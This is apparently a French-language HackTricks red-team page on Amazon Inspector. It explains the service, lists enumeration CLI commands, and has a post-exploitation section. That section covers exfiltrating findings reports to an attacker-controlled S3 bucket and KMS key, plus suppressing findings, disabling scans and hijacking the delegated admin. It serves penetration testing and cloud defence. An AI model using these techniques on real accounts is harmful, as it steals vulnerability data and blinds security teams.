AWS - Inspector Enum

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

Inspector

Amazon Inspector est un service avancĂ© et automatisĂ© de gestion des vulnĂ©rabilitĂ©s conçu pour amĂ©liorer la sĂ©curitĂ© de votre environnement AWS. Ce service analyse en continu les instances Amazon EC2, les images de conteneurs dans Amazon ECR, Amazon ECS et les fonctions AWS Lambda Ă  la recherche de vulnĂ©rabilitĂ©s et d’expositions rĂ©seau non intentionnelles. En s’appuyant sur une base de donnĂ©es robuste d’intelligence sur les vulnĂ©rabilitĂ©s, Amazon Inspector fournit des rĂ©sultats dĂ©taillĂ©s, y compris des niveaux de gravitĂ© et des recommandations de remĂ©diation, aidant les organisations Ă  identifier et Ă  traiter proactivement les risques de sĂ©curitĂ©. Cette approche complĂšte garantit une posture de sĂ©curitĂ© renforcĂ©e Ă  travers divers services AWS, facilitant la conformitĂ© et la gestion des risques.

Key elements

Findings

Les findings dans Amazon Inspector sont des rapports dĂ©taillĂ©s sur les vulnĂ©rabilitĂ©s et les expositions dĂ©couvertes lors de l’analyse des instances EC2, des dĂ©pĂŽts ECR ou des fonctions Lambda. En fonction de son Ă©tat, les findings sont classĂ©s comme suit :

  • Active : Le finding n’a pas Ă©tĂ© remĂ©diĂ©.
  • Closed : Le finding a Ă©tĂ© remĂ©diĂ©.
  • Suppressed : Le finding a Ă©tĂ© marquĂ© avec cet Ă©tat en raison d’une ou plusieurs rĂšgles de suppression.

Les findings sont également classés en trois types :

  • Package : Ces findings concernent les vulnĂ©rabilitĂ©s dans les packages logiciels installĂ©s sur vos ressources. Des exemples incluent des bibliothĂšques obsolĂštes ou des dĂ©pendances avec des problĂšmes de sĂ©curitĂ© connus.
  • Code : Cette catĂ©gorie inclut les vulnĂ©rabilitĂ©s trouvĂ©es dans le code des applications exĂ©cutĂ©es sur vos ressources AWS. Les problĂšmes courants sont des erreurs de codage ou des pratiques non sĂ©curisĂ©es qui pourraient entraĂźner des violations de sĂ©curitĂ©.
  • Network : Les findings rĂ©seau identifient les expositions potentielles dans les configurations rĂ©seau qui pourraient ĂȘtre exploitĂ©es par des attaquants. Cela inclut des ports ouverts, des protocoles rĂ©seau non sĂ©curisĂ©s et des groupes de sĂ©curitĂ© mal configurĂ©s.

Filters and Suppression Rules

Les filtres et les rĂšgles de suppression dans Amazon Inspector aident Ă  gĂ©rer et Ă  prioriser les findings. Les filtres vous permettent de raffiner les findings en fonction de critĂšres spĂ©cifiques, tels que la gravitĂ© ou le type de ressource. Les rĂšgles de suppression vous permettent de supprimer certains findings considĂ©rĂ©s comme Ă  faible risque, dĂ©jĂ  attĂ©nuĂ©s, ou pour toute autre raison importante, empĂȘchant ainsi leur surcharge dans vos rapports de sĂ©curitĂ© et vous permettant de vous concentrer sur des problĂšmes plus critiques.

Software Bill of Materials (SBOM)

Un Software Bill of Materials (SBOM) dans Amazon Inspector est une liste d’inventaire imbriquĂ©e exportable dĂ©taillant tous les composants d’un package logiciel, y compris les bibliothĂšques et les dĂ©pendances. Les SBOM aident Ă  fournir de la transparence dans la chaĂźne d’approvisionnement logicielle, permettant une meilleure gestion des vulnĂ©rabilitĂ©s et conformitĂ©. Ils sont cruciaux pour identifier et attĂ©nuer les risques associĂ©s aux composants logiciels open source et tiers.

Key features

Export findings

Amazon Inspector offre la possibilitĂ© d’exporter des findings vers des Amazon S3 Buckets, Amazon EventBridge et AWS Security Hub, ce qui vous permet de gĂ©nĂ©rer des rapports dĂ©taillĂ©s des vulnĂ©rabilitĂ©s et expositions identifiĂ©es pour une analyse ou un partage ultĂ©rieur Ă  une date et heure spĂ©cifiques. Cette fonctionnalitĂ© prend en charge divers formats de sortie tels que CSV et JSON, facilitant l’intĂ©gration avec d’autres outils et systĂšmes. La fonctionnalitĂ© d’exportation permet de personnaliser les donnĂ©es incluses dans les rapports, vous permettant de filtrer les findings en fonction de critĂšres spĂ©cifiques tels que la gravitĂ©, le type de ressource ou la plage de dates, et incluant par dĂ©faut tous vos findings dans la rĂ©gion AWS actuelle avec un statut Actif.

Lors de l’exportation des findings, une clĂ© de service de gestion des clĂ©s (KMS) est nĂ©cessaire pour chiffrer les donnĂ©es lors de l’exportation. Les clĂ©s KMS garantissent que les findings exportĂ©s sont protĂ©gĂ©s contre tout accĂšs non autorisĂ©, fournissant une couche de sĂ©curitĂ© supplĂ©mentaire pour les informations sensibles sur les vulnĂ©rabilitĂ©s.

Amazon EC2 instances scanning

Amazon Inspector offre des capacitĂ©s de scan robustes pour les instances Amazon EC2 afin de dĂ©tecter les vulnĂ©rabilitĂ©s et les problĂšmes de sĂ©curitĂ©. Inspector compare les mĂ©tadonnĂ©es extraites de l’instance EC2 avec des rĂšgles provenant d’avis de sĂ©curitĂ© afin de produire des vulnĂ©rabilitĂ©s de package et des problĂšmes de connectivitĂ© rĂ©seau. Ces scans peuvent ĂȘtre effectuĂ©s par des mĂ©thodes basĂ©es sur un agent ou sans agent, selon la configuration des paramĂštres de mode de scan de votre compte.

  • Agent-Based : Utilise l’agent AWS Systems Manager (SSM) pour effectuer des scans approfondis. Cette mĂ©thode permet une collecte et une analyse de donnĂ©es complĂštes directement depuis l’instance.
  • Agentless : Fournit une alternative lĂ©gĂšre qui ne nĂ©cessite pas l’installation d’un agent sur l’instance, crĂ©ant un instantanĂ© EBS de chaque volume de l’instance EC2, recherchant des vulnĂ©rabilitĂ©s, puis le supprimant ; tirant parti de l’infrastructure AWS existante pour le scan.

Le mode de scan détermine quelle méthode sera utilisée pour effectuer les scans EC2 :

  • Agent-Based : Implique l’installation de l’agent SSM sur les instances EC2 pour une inspection approfondie.
  • Hybrid Scanning : Combine les mĂ©thodes basĂ©es sur un agent et sans agent pour maximiser la couverture et minimiser l’impact sur les performances. Dans les instances EC2 oĂč l’agent SSM est installĂ©, Inspector effectuera un scan basĂ© sur un agent, et pour celles oĂč il n’y a pas d’agent SSM, le scan effectuĂ© sera sans agent.

Une autre fonctionnalitĂ© importante est l’inspection approfondie pour les instances EC2 Linux. Cette fonctionnalitĂ© offre une analyse approfondie du logiciel et de la configuration des instances EC2 Linux, fournissant des Ă©valuations dĂ©taillĂ©es des vulnĂ©rabilitĂ©s, y compris les vulnĂ©rabilitĂ©s du systĂšme d’exploitation, les vulnĂ©rabilitĂ©s des applications et les mauvaises configurations, garantissant une Ă©valuation complĂšte de la sĂ©curitĂ©. Cela est rĂ©alisĂ© grĂące Ă  l’inspection de chemins personnalisĂ©s et de tous ses sous-rĂ©pertoires. Par dĂ©faut, Amazon Inspector scannera les Ă©lĂ©ments suivants, mais chaque compte membre peut dĂ©finir jusqu’à 5 chemins personnalisĂ©s supplĂ©mentaires, et chaque administrateur dĂ©lĂ©guĂ© jusqu’à 10 :

  • /usr/lib
  • /usr/lib64
  • /usr/local/lib
  • /usr/local/lib64

Amazon ECR container images scanning

Amazon Inspector fournit des capacités de scan robustes pour les images de conteneurs Amazon Elastic Container Registry (ECR), garantissant que les vulnérabilités des packages sont détectées et gérées efficacement.

  • Basic Scanning : Il s’agit d’un scan rapide et lĂ©ger qui identifie les vulnĂ©rabilitĂ©s connues des packages OS dans les images de conteneurs en utilisant un ensemble standard de rĂšgles du projet open-source Clair. Avec cette configuration de scan, vos dĂ©pĂŽts seront scannĂ©s lors de la poussĂ©e ou en effectuant des scans manuels.
  • Enhanced Scanning : Cette option ajoute la fonctionnalitĂ© de scan continu en plus du scan lors de la poussĂ©e. Le scan amĂ©liorĂ© plonge plus profondĂ©ment dans les couches de chaque image de conteneur pour identifier les vulnĂ©rabilitĂ©s dans les packages OS et dans les packages de langages de programmation avec une prĂ©cision accrue. Il analyse Ă  la fois l’image de base et toutes les couches supplĂ©mentaires, fournissant une vue complĂšte des problĂšmes de sĂ©curitĂ© potentiels.

Amazon Lambda functions scanning

Amazon Inspector inclut des capacitĂ©s de scan complĂštes pour les fonctions AWS Lambda et ses couches, garantissant la sĂ©curitĂ© et l’intĂ©gritĂ© des applications sans serveur. Inspector propose deux types de scan pour les fonctions Lambda :

  • Lambda standard scanning : Cette fonctionnalitĂ© par dĂ©faut identifie les vulnĂ©rabilitĂ©s logicielles dans les dĂ©pendances du package d’application ajoutĂ©es Ă  votre fonction Lambda et Ă  ses couches. Par exemple, si votre fonction utilise une version d’une bibliothĂšque comme python-jwt avec une vulnĂ©rabilitĂ© connue, elle gĂ©nĂšre un finding.
  • Lambda code scanning : Analyse le code d’application personnalisĂ© Ă  la recherche de problĂšmes de sĂ©curitĂ©, dĂ©tectant des vulnĂ©rabilitĂ©s telles que des failles d’injection, des fuites de donnĂ©es, une cryptographie faible et un chiffrement manquant. Elle capture des extraits de code mettant en Ă©vidence les vulnĂ©rabilitĂ©s dĂ©tectĂ©es, telles que des identifiants codĂ©s en dur. Les findings incluent des suggestions de remĂ©diation dĂ©taillĂ©es et des extraits de code pour corriger les problĂšmes.

Center for Internet Security (CIS) scans

Amazon Inspector inclut des scans CIS pour Ă©valuer les systĂšmes d’exploitation des instances Amazon EC2 par rapport aux recommandations des meilleures pratiques du Center for Internet Security (CIS). Ces scans garantissent que les configurations respectent les normes de sĂ©curitĂ© de l’industrie.

  • Configuration : Les scans CIS Ă©valuent si les configurations systĂšme rĂ©pondent Ă  des recommandations spĂ©cifiques du CIS Benchmark, chaque vĂ©rification Ă©tant liĂ©e Ă  un ID de vĂ©rification et un titre CIS.
  • Execution : Les scans sont effectuĂ©s ou programmĂ©s en fonction des balises d’instance et des horaires dĂ©finis.
  • Results : Les rĂ©sultats post-scan indiquent quelles vĂ©rifications ont rĂ©ussi, Ă©tĂ© ignorĂ©es ou Ă©chouĂ©es, fournissant un aperçu de la posture de sĂ©curitĂ© de chaque instance.

Enumeration

# Administrator and member accounts #

## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
aws inspector2 get-delegated-admin-account

## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
aws inspector2 list-members [--only-associated | --no-only-associated]
## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
aws inspector2 get-member --account-id <value>
## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-account-status [--account-ids <value>]
## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-free-trial-info --account-ids <value>
## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]

## List an account's permissions associated with AWS Inspector
aws inspector2 list-account-permissions

# Findings #

## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
aws inspector2 list-findings
## Retrieve vulnerability intelligence details for the specified findings
aws inspector2 batch-get-finding-details --finding-arns <value>
## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
## Retrieve code snippet information about one or more specified code vulnerability findings
aws inspector2 batch-get-code-snippet --finding-arns <value>
## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
aws inspector2 get-findings-report-status --report-id <value>

# CIS #

## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scan-configurations
## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scans
## Retrieve a report from a completed CIS scan
aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
## Retrieve details about the specific CIS scan over the specified resource
aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
## List CIS scan results broken down by check
aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
## List CIS scan results broken down by target resource
aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>

# Configuration #

## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
aws inspector2 describe-organization-configuration
## Retrieve the configuration settings about EC2 scan and ECR re-scan
aws inspector2 get-configuration
## Retrieve EC2 Deep Inspection configuration associated with your account
aws inspector2 get-ec2-deep-inspection-configuration

# Miscellaneous #

## Retrieve the details of a Software Bill of Materials (SBOM) report
aws inspector2 get-sbom-export --report-id <value>

## Retrieve the coverage details for the specified vulnerabilities
aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>

## Retrieve the tags attached to the specified resource
aws inspector2 list-tags-for-resource --resource-arn <value>

## Retrieve the AWS KMS key used to encrypt the specified code snippets
aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>

## List the filters associated to your AWS account
aws inspector2 list-filters

## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage
## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage-statistics

## List the aggregated usage total over the last 30 days
aws inspector2 list-usage-totals [--account-ids <value>]

### INSPECTOR CLASSIC ###

## Assessments info, there is a "describe" action for each one to get more info
aws inspector list-assessment-runs
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-event-subscriptions

## Get findings
aws inspector list-findings

## Get exclusions
aws inspector list-exclusions --assessment-run-arn <arn>

## Rule packages
aws inspector list-rules-packages

Post Exploitation

Tip

Du point de vue d’un attaquant, ce service peut aider l’attaquant Ă  trouver des vulnĂ©rabilitĂ©s et des expositions rĂ©seau qui pourraient l’aider Ă  compromettre d’autres instances/conteneurs.

Cependant, un attaquant pourrait Ă©galement ĂȘtre intĂ©ressĂ© Ă  perturber ce service afin que la victime ne puisse pas voir les vulnĂ©rabilitĂ©s (toutes ou spĂ©cifiques).

inspector2:CreateFindingsReport, inspector2:CreateSBOMReport

Un attaquant pourrait gĂ©nĂ©rer des rapports dĂ©taillĂ©s sur les vulnĂ©rabilitĂ©s ou les factures de matĂ©riaux logiciels (SBOM) et les exfiltrer de votre environnement AWS. Ces informations pourraient ĂȘtre exploitĂ©es pour identifier des faiblesses spĂ©cifiques, des logiciels obsolĂštes ou des dĂ©pendances non sĂ©curisĂ©es, permettant des attaques ciblĂ©es.

# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
# SBOM report
aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]

L’exemple suivant montre comment exfiltrer toutes les dĂ©couvertes actives d’Amazon Inspector vers un bucket Amazon S3 contrĂŽlĂ© par un attaquant avec une clĂ© Amazon KMS contrĂŽlĂ©e par un attaquant :

  1. CrĂ©er un bucket Amazon S3 et attacher une politique Ă  celui-ci afin qu’il soit accessible depuis la victime Amazon Inspector :
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "allow-inspector",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"],
"Resource": "arn:aws:s3:::inspector-findings/*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
},
"ArnLike": {
"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
}
}
}
]
}
  1. CrĂ©er une clĂ© Amazon KMS et attacher une politique Ă  celle-ci afin qu’elle soit utilisable par l’Amazon Inspector de la victime :
{
"Version": "2012-10-17",
"Id": "key-policy",
"Statement": [
{
...
},
{
"Sid": "Allow victim Amazon Inspector to use the key",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
}
}
}
]
}
  1. ExĂ©cutez la commande pour crĂ©er le rapport de rĂ©sultats en l’exfiltrant :
aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f
  • Impact potentiel : GĂ©nĂ©ration et exfiltration de rapports dĂ©taillĂ©s sur les vulnĂ©rabilitĂ©s et les logiciels, obtenant des informations sur des vulnĂ©rabilitĂ©s spĂ©cifiques et des faiblesses de sĂ©curitĂ©.

inspector2:CancelFindingsReport, inspector2:CancelSbomExport

Un attaquant pourrait annuler la gĂ©nĂ©ration du rapport de constatations spĂ©cifiĂ© ou du rapport SBOM, empĂȘchant les Ă©quipes de sĂ©curitĂ© de recevoir des informations en temps utile sur les vulnĂ©rabilitĂ©s et les factures de matĂ©riaux logiciels (SBOM), retardant la dĂ©tection et la remĂ©diation des problĂšmes de sĂ©curitĂ©.

# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
# Cancel SBOM report generatiom
aws inspector2 cancel-sbom-export --report-id <value>
  • Impact potentiel : Perturbation de la surveillance de la sĂ©curitĂ© et prĂ©vention de la dĂ©tection et de la remĂ©diation en temps opportun des problĂšmes de sĂ©curitĂ©.

inspector2:CreateFilter, inspector2:UpdateFilter, inspector2:DeleteFilter

Un attaquant disposant de ces autorisations pourrait manipuler les rĂšgles de filtrage qui dĂ©terminent quelles vulnĂ©rabilitĂ©s et problĂšmes de sĂ©curitĂ© sont signalĂ©s ou supprimĂ©s (si l’action est dĂ©finie sur SUPPRESS, une rĂšgle de suppression serait crĂ©Ă©e). Cela pourrait cacher des vulnĂ©rabilitĂ©s critiques aux administrateurs de la sĂ©curitĂ©, facilitant l’exploitation de ces faiblesses sans dĂ©tection. En modifiant ou en supprimant des filtres importants, un attaquant pourrait Ă©galement crĂ©er du bruit en inondant le systĂšme de rĂ©sultats non pertinents, entravant ainsi la surveillance et la rĂ©ponse efficaces en matiĂšre de sĂ©curitĂ©.

# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
# Update
aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
# Delete
aws inspector2 delete-filter --arn <value>
  • Impact potentiel : Camouflage ou suppression de vulnĂ©rabilitĂ©s critiques, ou inondation du systĂšme avec des rĂ©sultats non pertinents.

inspector2:DisableDelegatedAdminAccount, (inspector2:EnableDelegatedAdminAccount & organizations:ListDelegatedAdministrators & organizations:EnableAWSServiceAccess & iam:CreateServiceLinkedRole)

Un attaquant pourrait perturber de maniÚre significative la structure de gestion de la sécurité.

  • En dĂ©sactivant le compte administrateur dĂ©lĂ©guĂ©, l’attaquant pourrait empĂȘcher l’équipe de sĂ©curitĂ© d’accĂ©der et de gĂ©rer les paramĂštres et rapports d’Amazon Inspector.
  • L’activation d’un compte administrateur non autorisĂ© permettrait Ă  un attaquant de contrĂŽler les configurations de sĂ©curitĂ©, potentiellement en dĂ©sactivant les analyses ou en modifiant les paramĂštres pour cacher des activitĂ©s malveillantes.

Warning

Il est nĂ©cessaire que le compte non autorisĂ© soit dans la mĂȘme organisation que la victime pour devenir l’administrateur dĂ©lĂ©guĂ©.

Pour que le compte non autorisĂ© devienne l’administrateur dĂ©lĂ©guĂ©, il est Ă©galement nĂ©cessaire qu’aprĂšs la dĂ©sactivation de l’administrateur dĂ©lĂ©guĂ© lĂ©gitime, et avant que le compte non autorisĂ© soit activĂ© en tant qu’administrateur dĂ©lĂ©guĂ©, l’administrateur lĂ©gitime doit ĂȘtre dĂ©sinscrit en tant qu’administrateur dĂ©lĂ©guĂ© de l’organisation. Cela peut ĂȘtre fait avec la commande suivante (organizations:DeregisterDelegatedAdministrator permission requise) : aws organizations deregister-delegated-administrator --account-id <legit-account-id> --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)

# Disable
aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
# Enable
aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>
  • Impact potentiel : Perturbation de la gestion de la sĂ©curitĂ©.

inspector2:AssociateMember, inspector2:DisassociateMember

Un attaquant pourrait manipuler l’association des comptes membres au sein d’une organisation Amazon Inspector. En associant des comptes non autorisĂ©s ou en dissociant des comptes lĂ©gitimes, un attaquant pourrait contrĂŽler quels comptes sont inclus dans les analyses de sĂ©curitĂ© et les rapports. Cela pourrait entraĂźner l’exclusion de comptes critiques de la surveillance de la sĂ©curitĂ©, permettant Ă  l’attaquant d’exploiter des vulnĂ©rabilitĂ©s dans ces comptes sans dĂ©tection.

Warning

Cette action doit ĂȘtre effectuĂ©e par l’administrateur dĂ©lĂ©guĂ©.

# Associate
aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>
  • Impact potentiel : Exclusion de comptes clĂ©s des analyses de sĂ©curitĂ©, permettant l’exploitation non dĂ©tectĂ©e des vulnĂ©rabilitĂ©s.

inspector2:Disable, (inspector2:Enable & iam:CreateServiceLinkedRole)

Un attaquant avec la permission inspector2:Disable serait capable de dĂ©sactiver les analyses de sĂ©curitĂ© sur des types de ressources spĂ©cifiques (EC2, ECR, Lambda, code Lambda) pour les comptes spĂ©cifiĂ©s, laissant des parties de l’environnement AWS non surveillĂ©es et vulnĂ©rables aux attaques. De plus, grĂące aux permissions inspector2:Enable & iam:CreateServiceLinkedRole, un attaquant pourrait alors rĂ©activer les analyses de maniĂšre sĂ©lective pour Ă©viter la dĂ©tection de configurations suspectes.

Warning

Cette action doit ĂȘtre effectuĂ©e par l’administrateur dĂ©lĂ©guĂ©.

# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
# Enable
aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]
  • Impact potentiel : CrĂ©ation de zones d’ombre dans la surveillance de la sĂ©curitĂ©.

inspector2:UpdateOrganizationConfiguration

Un attaquant disposant de cette autorisation pourrait mettre à jour les configurations de votre organisation Amazon Inspector, affectant les fonctionnalités de scan par défaut activées pour les nouveaux comptes membres.

Warning

Cette action doit ĂȘtre effectuĂ©e par l’administrateur dĂ©lĂ©guĂ©.

aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>
  • Impact potentiel : Modifier les politiques et configurations de scan de sĂ©curitĂ© pour l’organisation.

inspector2:TagResource, inspector2:UntagResource

Un attaquant pourrait manipuler les tags sur les ressources AWS Inspector, qui sont critiques pour organiser, suivre et automatiser les évaluations de sécurité. En modifiant ou en supprimant des tags, un attaquant pourrait potentiellement cacher des vulnérabilités des scans de sécurité, perturber les rapports de conformité et interférer avec les processus de remédiation automatisés, entraßnant des problÚmes de sécurité non contrÎlés et une intégrité du systÚme compromise.

aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
  • Impact potentiel : Masquage des vulnĂ©rabilitĂ©s, perturbation des rapports de conformitĂ©, perturbation de l’automatisation de la sĂ©curitĂ© et perturbation de l’allocation des coĂ»ts.

Références

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks